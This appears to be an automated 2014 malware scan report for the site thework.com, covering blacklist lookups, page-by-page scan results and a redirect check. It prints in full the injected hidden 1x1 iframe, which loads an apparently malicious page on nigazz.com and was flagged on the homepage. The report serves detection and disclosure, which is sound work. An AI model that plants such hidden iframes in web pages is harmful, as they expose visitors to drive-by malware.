Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thework.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thework.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://thework.com/ | HTTP/1.1 302 Found Connection: close Date: Tue, 29 Jul 2014 17:18:41 GMT Location: http://www.thework.com/index.php Server: Apache/2.2.3 (Red Hat) Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.thework.com/index.php | 200 OK Content-Length: 35609 Content-Type: text/html | malicious |
Page code contains blacklisted domain: www.nigazz.com <iframe src="http://www.nigazz.com/kt/index.php?rig" height="1" width="1" border="0"></iframe><html lang=""> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <title>The Work of Byron Katie :: Homepage</title> <script src="js/jquery.min.js" type="text/javascript" charset="utf-8"></script> <script src="js/jcarousellite_1.0.1.js" type="text/javas ...[4163 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://www.nigazz.com/kt/index.php?rig This URL is marked by Yandex as suspicious <iframe src="http://www.nigazz.com/kt/index.php?rig" height="1" width="1" border="0"> | ||
http://www.thework.com/js/jquery.min.js | 200 OK Content-Length: 78768 Content-Type: application/x-javascript | clean |
http://thework.com/js/jcarousellite_1.0.1.js | 200 OK Content-Length: 14310 Content-Type: application/x-javascript | clean |
http://thework.com/js/jquery.cycle.all.min.js | 200 OK Content-Length: 32066 Content-Type: application/x-javascript | clean |
http://thework.com/js/jquery.prettyPhoto.js | 200 OK Content-Length: 34708 Content-Type: application/x-javascript | clean |
http://thework.com/js/bki.cookie.js | 200 OK Content-Length: 6824 Content-Type: application/x-javascript | clean |
https://d31qbv1cthcecs.cloudfront.net/atrk.js | 200 OK Content-Length: 3580 Content-Type: text/javascript | clean |
http://thework.com/includes/Jfooter_bar.js | 200 OK Content-Length: 2537 Content-Type: application/x-javascript | clean |
http://thework.com/php/flag-list.js | 200 OK Content-Length: 645 Content-Type: application/x-javascript | clean |
http://thework.com/thework.php | 200 OK Content-Length: 27949 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: downloads.thework.com <html lang="">
<head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <meta property='og:image' content='http://www.thework.com/img/bki_logo_more_blue.png'> <title>About The Work :: The Work of Byron Katie</title> <script src="js/jquery.min.js" type="text/javascript" charset="utf-8"></script> & ...[4399 bytes skipped]... | ||
http://thework.com/js/jquery.min.js | 200 OK Content-Length: 78768 Content-Type: application/x-javascript | clean |
http://thework.com/js/bki.div_tog.js | 200 OK Content-Length: 407 Content-Type: application/x-javascript | clean |
http://www.thework.com/js/thework_facilitators.js | 200 OK Content-Length: 1284 Content-Type: application/x-javascript | clean |
http://www.thework.com/js/thework_language.js | 200 OK Content-Length: 1320 Content-Type: application/x-javascript | clean |
http://thework.com/./ | HTTP/1.1 302 Found Connection: close Date: Tue, 29 Jul 2014 17:18:52 GMT Location: http://www.thework.com/index.php Server: Apache/2.2.3 (Red Hat) Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.thework.com/test404page.js | 404 Not Found Content-Length: 293 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thework.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 29 Jul 2014 17:18:41 GMT
Location: http://www.thework.com/index.php
Server: Apache/2.2.3 (Red Hat)
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
...293 bytes of data.
GET / HTTP/1.1
Host: thework.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 29 Jul 2014 17:18:41 GMT
Location: http://www.thework.com/index.php
Server: Apache/2.2.3 (Red Hat)
Content-Length: 293
Content-Type: text/html; charset=iso-8859-1
...293 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thework.com
Referer: http://www.google.com/search?q=thework.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thework.com
Referer: http://www.google.com/search?q=thework.com
Result:
The result is similar to the first query. There are no suspicious redirects found.